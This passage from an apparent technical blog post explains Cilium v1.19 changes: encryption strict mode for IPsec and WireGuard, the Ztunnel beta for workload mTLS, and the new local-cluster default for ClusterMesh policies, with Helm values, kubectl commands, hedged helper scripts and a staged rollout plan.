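&lt;p&gt;v1.19 adds &lt;code&gt;encryption.strictMode&lt;/code&gt; to both IPsec and WireGuard. With it enabled, traffic to destinations in the strict-mode CIDR that cannot be encrypted is dropped instead of falling back to plaintext. Example Helm values for each mode:&lt;br&gt;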
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# helm/cilium-values.yaml — IPsec strict mode&lt;/span&gt;
&lt;span class="c1"&gt;# WARNING: Enable only after keys are distributed to every node.&lt;/span&gt;
&lt;span class="c1"&gt;# Partial rollout will drop plaintext and cut communication.&lt;/span&gt;
&lt;span class="na"&gt;encryption&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ipsec&lt;/span&gt;
  &lt;span class="na"&gt;ipsec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;interface&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
    &lt;span class="na"&gt;keyFile&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;keys&lt;/span&gt;
    &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/etc/ipsec&lt;/span&gt;
  &lt;span class="na"&gt;strictMode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;                &lt;span class="c1"&gt;# v1.19 new — best-effort -&amp;gt; hard requirement&lt;/span&gt;
    &lt;span class="na"&gt;cidr&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;10.0.0.0/8"&lt;/span&gt;           &lt;span class="c1"&gt;# CIDR strict applies to (usually covers PodCIDR)&lt;/span&gt;
    &lt;span class="na"&gt;allowRemoteNodeIdentities&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;   &lt;span class="c1"&gt;# new nodes without keys are dropped immediately&lt;/span&gt;
&lt;span class="na"&gt;nodeinit&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
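
&lt;p&gt;The warning in the IPsec values above depends on every node having the key before strict mode is switched on. The sketch below shows one way to generate that key. It assumes two things from Cilium's IPsec documentation: the key-string layout (&lt;code&gt;SPI+ algorithm hex-key ICV-bits&lt;/code&gt;) and the default &lt;code&gt;cilium-ipsec-keys&lt;/code&gt; Secret name. Verify both against the docs for your exact version. The function name &lt;code&gt;gen_ipsec_key&lt;/code&gt; is hypothetical.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;#!/usr/bin/env bash
# Hypothetical helper: build an IPsec key string for Cilium's keyFile ("keys").
# Assumed layout: "SPI+ rfc4106(gcm(aes)) HEXKEY 128"
gen_ipsec_key() {
  local spi="${1:-3}"   # key ID / SPI; increment it on every key rotation
  local hex
  # 20 random bytes = 16-byte AES-GCM key + 4-byte salt, hex-encoded (40 chars)
  hex=$(head -c 20 /dev/urandom | od -An -tx1 | tr -d ' \n')
  printf '%s+ rfc4106(gcm(aes)) %s 128\n' "$spi" "$hex"
}

# Usage: store the key in the Secret the chart mounts at /etc/ipsec
#   kubectl create -n kube-system secret generic cilium-ipsec-keys \
#     --from-literal=keys="$(gen_ipsec_key 3)"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;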





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# helm/cilium-values.yaml — WireGuard strict mode&lt;/span&gt;
&lt;span class="na"&gt;encryption&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;wireguard&lt;/span&gt;
  &lt;span class="na"&gt;nodeEncryption&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;wireguard&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;persistentKeepalive&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;0s"&lt;/span&gt;
  &lt;span class="na"&gt;strictMode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;                &lt;span class="c1"&gt;# v1.19 new&lt;/span&gt;
    &lt;span class="na"&gt;cidr&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;10.0.0.0/8"&lt;/span&gt;
    &lt;span class="na"&gt;allowRemoteNodeIdentities&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Apply the values, then verify&lt;/span&gt;
helm upgrade cilium cilium/cilium &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--version&lt;/span&gt; 1.19.4 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--namespace&lt;/span&gt; kube-system &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-f&lt;/span&gt; helm/cilium-values.yaml &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--reuse-values&lt;/span&gt;

&lt;span class="c"&gt;# Strict status of one agent (ds/cilium picks a single pod; repeat per node)&lt;/span&gt;
kubectl &lt;span class="nt"&gt;-n&lt;/span&gt; kube-system &lt;span class="nb"&gt;exec&lt;/span&gt; ds/cilium &lt;span class="nt"&gt;-c&lt;/span&gt; cilium-agent &lt;span class="nt"&gt;--&lt;/span&gt; cilium-dbg status &lt;span class="nt"&gt;--verbose&lt;/span&gt; | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-A&lt;/span&gt; 3 Encryption
&lt;span class="c"&gt;# Encryption:               Wireguard [strict]&lt;/span&gt;
&lt;span class="c"&gt;# Strict mode CIDR:         10.0.0.0/8&lt;/span&gt;
&lt;span class="c"&gt;# Allowed remote identities: 0&lt;/span&gt;
&lt;span class="c"&gt;# Unencrypted drops (last 1m): 0&lt;/span&gt;

&lt;span class="c"&gt;# Intentional plaintext blocking check&lt;/span&gt;
kubectl &lt;span class="nb"&gt;exec&lt;/span&gt; &lt;span class="nt"&gt;-it&lt;/span&gt; test-pod &lt;span class="nt"&gt;--&lt;/span&gt; ping &lt;span class="nt"&gt;-c&lt;/span&gt; 3 unencrypted-peer-ip
&lt;span class="c"&gt;# PING ... 100% packet loss   ← strict is doing its job&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
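
&lt;p&gt;&lt;code&gt;ds/cilium&lt;/code&gt; resolves to a single agent pod, so checking every node requires a loop. The sketch below makes three assumptions. First, the in-pod CLI is &lt;code&gt;cilium-dbg&lt;/code&gt; (its name since Cilium 1.15). Second, agent pods carry the standard &lt;code&gt;k8s-app=cilium&lt;/code&gt; label. Third, the &lt;code&gt;[strict]&lt;/code&gt; marker appears on the Encryption line as in the sample output above; the exact wording may differ between versions. &lt;code&gt;status_is_strict&lt;/code&gt; and &lt;code&gt;check_all_agents&lt;/code&gt; are hypothetical names.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;#!/usr/bin/env bash
# Hypothetical helpers: confirm every Cilium agent reports strict encryption.

# Succeeds if an "Encryption:" line in status text on stdin contains [strict].
status_is_strict() {
  grep 'Encryption:' | grep -qF '[strict]'
}

# Loop over all agent pods; print the non-strict ones and fail if any exist.
check_all_agents() {
  local pod bad=0
  for pod in $(kubectl -n kube-system get pods -l k8s-app=cilium -o name); do
    if ! kubectl -n kube-system exec "$pod" -c cilium-agent -- cilium-dbg status \
        | status_is_strict; then
      echo "NOT STRICT: $pod"
      bad=1
    fi
  done
  return "$bad"
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;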



&lt;h3&gt;
  
  
  2.3 Operational rollout — 4-step gradient to avoid cluster-wide outage
&lt;/h3&gt;

&lt;p&gt;Flipped at the wrong time, strict mode can instantly cut pod-to-pod traffic across the whole cluster. ManoIT's internal standard is a four-step gradient:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Step&lt;/th&gt;
&lt;th&gt;Action&lt;/th&gt;
&lt;th&gt;Verification&lt;/th&gt;
&lt;th&gt;Rollback trigger&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Distribute the keyFile to every node, then restart Cilium with encryption enabled but strict mode still off&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cilium status&lt;/code&gt; reports keys OK on every node&lt;/td&gt;
&lt;td&gt;If any single node lacks keys, abort&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Set &lt;code&gt;strictMode.enabled=true&lt;/code&gt; with &lt;code&gt;allowRemoteNodeIdentities=true&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Hubble drop counters unchanged&lt;/td&gt;
&lt;td&gt;Drops appear → flip back to false immediately&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;After 1 week stable, flip &lt;code&gt;allowRemoteNodeIdentities=false&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Join a fresh node, verify post-key-registration traffic flows&lt;/td&gt;
&lt;td&gt;If new nodes must join without keys, temporarily set true&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Add Prometheus alert on &lt;code&gt;cilium_encryption_unencrypted_packets_dropped_total&lt;/code&gt; increasing&lt;/td&gt;
&lt;td&gt;Zero alert fires for 14 days&lt;/td&gt;
&lt;td&gt;On a fire, root-cause first, then re-enable&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
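
&lt;p&gt;The rollback triggers in steps 2 and 4 come down to one question: did the unencrypted-drop counter grow after the flip? The sketch below encodes only that decision. It assumes you sample &lt;code&gt;cilium_encryption_unencrypted_packets_dropped_total&lt;/code&gt; (the metric named in step 4), summed across nodes, before and after the change. How you fetch the samples (Prometheus API, Grafana export) is left open, and &lt;code&gt;strict_gate&lt;/code&gt; is a hypothetical name.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;#!/usr/bin/env bash
# Hypothetical gate for the strict-mode rollout: compare two samples of the
# unencrypted-drop counter and decide whether to proceed or roll back.
# $1: counter before the change, $2: counter after a soak period.
strict_gate() {
  local before=$1 after=$2
  if [ "$after" -lt "$before" ]; then
    # A counter only decreases when agents restart; resample rather than guess.
    echo "resample"
    return 2
  fi
  if [ "$after" -gt "$before" ]; then
    echo "rollback: $(( after - before )) new unencrypted drops"
    return 1
  fi
  echo "proceed"
}

# Usage:
#   if strict_gate 120 120; then echo "safe to continue to the next step"; fi
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;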

&lt;h2&gt;
  
  
  3. Ztunnel Transparent Encryption Beta — sidecarless workload authentication
&lt;/h2&gt;

&lt;p&gt;The second big change is aligned with the service-mesh ecosystem's direction. v1.19 ships a beta integration of &lt;strong&gt;Ztunnel&lt;/strong&gt; (zero-trust tunnel), the same primitive Istio Ambient Mode standardized. This is not just "Istio compatibility" — it means the Cilium node agent coordinates directly with ztunnel to run a separate mTLS dataplane wrapping workload-to-workload TCP.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.1 What is different from IPsec/WireGuard?
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Axis&lt;/th&gt;
&lt;th&gt;IPsec/WireGuard (node-to-node)&lt;/th&gt;
&lt;th&gt;Ztunnel (workload-to-workload)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Scope&lt;/td&gt;
&lt;td&gt;Node ↔ Node (L3/L4)&lt;/td&gt;
&lt;td&gt;Workload ↔ Workload (L4 / mTLS)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Auth unit&lt;/td&gt;
&lt;td&gt;Node ID (Cilium identity)&lt;/td&gt;
&lt;td&gt;SPIFFE SVID (workload ID)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Key management&lt;/td&gt;
&lt;td&gt;IPsec SA / WG peer key&lt;/td&gt;
&lt;td&gt;SPIRE-compatible SDS&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sidecars required&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No (ztunnel runs as a node DaemonSet)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Granularity&lt;/td&gt;
&lt;td&gt;Cluster-wide&lt;/td&gt;
&lt;td&gt;Per-namespace enrollment&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mesh interop&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;td&gt;Works with Istio Ambient L4 or Cilium Ztunnel&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  3.2 Enabling — namespace-scoped enrollment
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# helm/cilium-values.yaml — Ztunnel beta&lt;/span&gt;
&lt;span class="c1"&gt;# WARNING: Beta — recommend 4 weeks of staging validation before production&lt;/span&gt;
&lt;span class="na"&gt;encryption&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ztunnel&lt;/span&gt;
  &lt;span class="na"&gt;ztunnel&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;                       &lt;span class="c1"&gt;# v1.19 new beta gate&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;repository&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;quay.io/cilium/ztunnel&lt;/span&gt;
      &lt;span class="na"&gt;tag&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1.19.4&lt;/span&gt;
    &lt;span class="na"&gt;spire&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;                     &lt;span class="c1"&gt;# SPIFFE SVID issuance — requires SPIRE server&lt;/span&gt;
      &lt;span class="na"&gt;serverAddress&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;spire-server.spire-system:8081&lt;/span&gt;
      &lt;span class="na"&gt;trustDomain&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cluster.local&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Enroll a namespace into Ztunnel&lt;/span&gt;
kubectl label namespace payments cilium.io/ztunnel-enabled&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true
&lt;/span&gt;kubectl rollout restart &lt;span class="nt"&gt;-n&lt;/span&gt; payments deploy

&lt;span class="c"&gt;# Verify enrollment&lt;/span&gt;
kubectl &lt;span class="nt"&gt;-n&lt;/span&gt; kube-system get pods &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;ztunnel
&lt;span class="c"&gt;# NAME            READY   STATUS    AGE&lt;/span&gt;
&lt;span class="c"&gt;# ztunnel-abc12   1/1     Running   1m&lt;/span&gt;
&lt;span class="c"&gt;# ztunnel-def34   1/1     Running   1m&lt;/span&gt;

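&lt;span class="c"&gt;# Verify enrolled-workload mTLS&lt;/span&gt;
&lt;span class="c"&gt;# ztunnel encrypts transparently, so the app (and curl -v) still sees plaintext;&lt;/span&gt;
&lt;span class="c"&gt;# generate traffic, then look for the SPIFFE peer identity on the ztunnel side&lt;/span&gt;
kubectl &lt;span class="nt"&gt;-n&lt;/span&gt; payments &lt;span class="nb"&gt;exec&lt;/span&gt; &lt;span class="nt"&gt;-it&lt;/span&gt; api-pod &lt;span class="nt"&gt;--&lt;/span&gt; curl &lt;span class="nt"&gt;-v&lt;/span&gt; http://db:5432
kubectl &lt;span class="nt"&gt;-n&lt;/span&gt; kube-system logs &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;ztunnel &lt;span class="nt"&gt;--tail&lt;/span&gt; 50 | &lt;span class="nb"&gt;grep&lt;/span&gt; spiffe://cluster.local/ns/payments
&lt;span class="c"&gt;# Expect entries naming spiffe://cluster.local/ns/payments/sa/db (log format may vary by version)&lt;/span&gt;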
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
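
&lt;p&gt;Enrollment is per namespace, so a namespace can easily be missed. The sketch below is a drift check under that assumption. It compares the namespaces you intend to protect against the ones that actually carry the &lt;code&gt;cilium.io/ztunnel-enabled=true&lt;/code&gt; label used above. The function name and the namespace list in the usage line are hypothetical.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;#!/usr/bin/env bash
# Hypothetical drift check: which required namespaces are NOT enrolled in ztunnel?
# $1: space-separated namespaces that must be enrolled
# stdin: enrolled namespace names, one per line
missing_enrollment() {
  local enrolled ns
  enrolled=$(cat)
  for ns in $1; do
    # -x: whole-line match, -F: literal string, so "pay" never matches "payments"
    if ! printf '%s\n' "$enrolled" | grep -qxF -- "$ns"; then
      echo "$ns"
    fi
  done
}

# Usage against a live cluster:
#   kubectl get ns -l cilium.io/ztunnel-enabled=true \
#     -o custom-columns=NAME:.metadata.name --no-headers \
#     | missing_enrollment "payments billing"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;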



&lt;h2&gt;
  
  
  4. ClusterMesh policy-default-local-cluster — default change blocks incidents
&lt;/h2&gt;

&lt;p&gt;The quietest but most impactful change in v1.19. When a NetworkPolicy selector did not specify a cluster, v1.18 matched &lt;strong&gt;the entire mesh&lt;/strong&gt;. So if one cluster wrote &lt;code&gt;allow from app=frontend&lt;/code&gt;, workloads in another cluster labeled &lt;code&gt;app=frontend&lt;/code&gt; were also implicitly allowed. Even when operators meant "only inside my cluster," the policy quietly fanned out through the mesh.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.1 The accidental cross-cluster exposure pattern
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Pre-v1.19: unintentionally fanned out across the mesh&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cilium.io/v2&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;CiliumNetworkPolicy&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api-allow-frontend&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;endpointSelector&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;matchLabels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api&lt;/span&gt;
  &lt;span class="na"&gt;ingress&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;fromEndpoints&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;matchLabels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;frontend&lt;/span&gt;    &lt;span class="c1"&gt;# WARNING: in v1.18 this matched app=frontend across the entire mesh&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4.2 New default — local cluster only
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# v1.19 implicitly adds io.cilium.k8s.policy.cluster=&amp;lt;local&amp;gt;&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cilium.io/v2&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;CiliumNetworkPolicy&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api-allow-frontend&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;endpointSelector&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;matchLabels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api&lt;/span&gt;
  &lt;span class="na"&gt;ingress&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;fromEndpoints&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;matchLabels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;frontend&lt;/span&gt;    &lt;span class="c1"&gt;# v1.19 narrows to the local cluster&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Explicit cross-cluster opt-in: allow app=frontend from cluster-east only&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cilium.io/v2&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;CiliumNetworkPolicy&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api-allow-frontend-mesh&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;endpointSelector&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;matchLabels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api&lt;/span&gt;
  &lt;span class="na"&gt;ingress&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;fromEndpoints&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;matchLabels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;frontend&lt;/span&gt;
            &lt;span class="na"&gt;io.cilium.k8s.policy.cluster&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cluster-east&lt;/span&gt;   &lt;span class="c1"&gt;# explicit match&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4.3 Upgrade action — audit existing mesh policies first
&lt;/h3&gt;

&lt;p&gt;Upgrading to v1.19 &lt;strong&gt;may suddenly narrow policies that implicitly traversed the mesh, breaking communication.&lt;/strong&gt; The maintainers recommend the following procedure in the upgrade guide:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Step 1: Find CiliumNetworkPolicies whose ingress/egress endpoint selectors don't pin the cluster label&lt;/span&gt;
kubectl get ciliumnetworkpolicy &lt;span class="nt"&gt;-A&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; json &lt;span class="se"&gt;\&lt;/span&gt;
  | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'.items[]
      | select([.spec.ingress[]?.fromEndpoints[]?, .spec.egress[]?.toEndpoints[]?]
               | map((.matchLabels // {}) | has("io.cilium.k8s.policy.cluster") | not)
               | any)
      | .metadata.namespace + "/" + .metadata.name'&lt;/span&gt;

&lt;span class="c"&gt;# Step 2: Ask each policy owner whether the intent was mesh or local&lt;/span&gt;
&lt;span class="c"&gt;# Step 3: For mesh intent, PR explicit cluster labels&lt;/span&gt;
&lt;span class="c"&gt;# Step 4: Upgrade to v1.19 — missing mesh policies will sever communication immediately&lt;/span&gt;
helm upgrade cilium cilium/cilium &lt;span class="nt"&gt;--version&lt;/span&gt; 1.19.4 &lt;span class="nt"&gt;--namespace&lt;/span&gt; kube-system &lt;span class="nt"&gt;--reuse-values&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
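
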